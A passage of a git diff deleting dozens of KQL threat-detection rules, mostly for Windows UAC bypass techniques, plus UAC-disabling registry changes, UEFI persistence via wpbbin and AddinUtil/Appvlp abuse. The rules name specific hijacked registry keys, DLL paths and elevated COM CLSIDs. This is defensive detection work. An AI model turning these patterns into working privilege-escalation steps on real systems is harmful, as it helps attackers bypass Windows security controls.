-| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
deleted file mode 100644
index f8815880..00000000
--- a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql
deleted file mode 100644
index c912f517..00000000
--- a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
deleted file mode 100644
index c45c8dd3..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
deleted file mode 100644
index b14f6498..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql b/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql
deleted file mode 100644
index 949e3b2b..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_DismHost.kql b/Defense Evasion/UAC_Bypass_Using_DismHost.kql
deleted file mode 100644
index 63f130be..00000000
--- a/Defense Evasion/UAC_Bypass_Using_DismHost.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql b/Defense Evasion/UAC_Bypass_Using_EventVwr.kql
deleted file mode 100644
index 3043fd99..00000000
--- a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
deleted file mode 100644
index 974b22fe..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/22
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql
deleted file mode 100644
index 1ca85fad..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql
deleted file mode 100644
index eaf21560..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
deleted file mode 100644
index 7d63fa2a..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: high
-// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
deleted file mode 100644
index cadc4f08..00000000
--- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
deleted file mode 100644
index ebc4f60d..00000000
--- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
deleted file mode 100644
index 79b84858..00000000
--- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
deleted file mode 100644
index a2dfe81e..00000000
--- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql
deleted file mode 100644
index 594500b1..00000000
--- a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
deleted file mode 100644
index ef7a7239..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
deleted file mode 100644
index 96f8c1bd..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
deleted file mode 100644
index dc52850a..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql b/Defense Evasion/UAC_Bypass_Via_Wsreset.kql
deleted file mode 100644
index 7ddbf642..00000000
--- a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/07
-// Level: high
-// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_WSReset.kql b/Defense Evasion/UAC_Bypass_WSReset.kql
deleted file mode 100644
index b39549cb..00000000
--- a/Defense Evasion/UAC_Bypass_WSReset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System"))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql b/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql b/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql
deleted file mode 100644
index c13ab477..00000000
--- a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects UAC bypass method using Windows event viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql b/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql
deleted file mode 100644
index e6a2379f..00000000
--- a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Elastic (idea)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_Sdclt.kql b/Defense Evasion/UAC_Bypass_via_Sdclt.kql
deleted file mode 100644
index 62170641..00000000
--- a/Defense Evasion/UAC_Bypass_via_Sdclt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omer Yampel, Christian Burkard (Nextron Systems)
-// Date: 2017/03/17
-// Level: high
-// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Disabled.kql b/Defense Evasion/UAC_Disabled.kql
deleted file mode 100644
index 0ee19c33..00000000
--- a/Defense Evasion/UAC_Disabled.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Notification_Disabled.kql b/Defense Evasion/UAC_Notification_Disabled.kql
deleted file mode 100644
index 0c9d6980..00000000
--- a/Defense Evasion/UAC_Notification_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
-UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
-When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql b/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql
deleted file mode 100644
index 684fe543..00000000
--- a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
-The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
-When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
deleted file mode 100644
index b24cd1fc..00000000
--- a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
deleted file mode 100644
index dba934a8..00000000
--- a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceProcessEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql b/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql
deleted file mode 100644
index 6ef2677f..00000000
--- a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql
deleted file mode 100644
index 6ee88ff8..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql
deleted file mode 100644
index b28bbd12..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: Detects uncommon child processes of Appvlp.EXE
-Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
-Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
-or to mark a file as a system file.
-
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
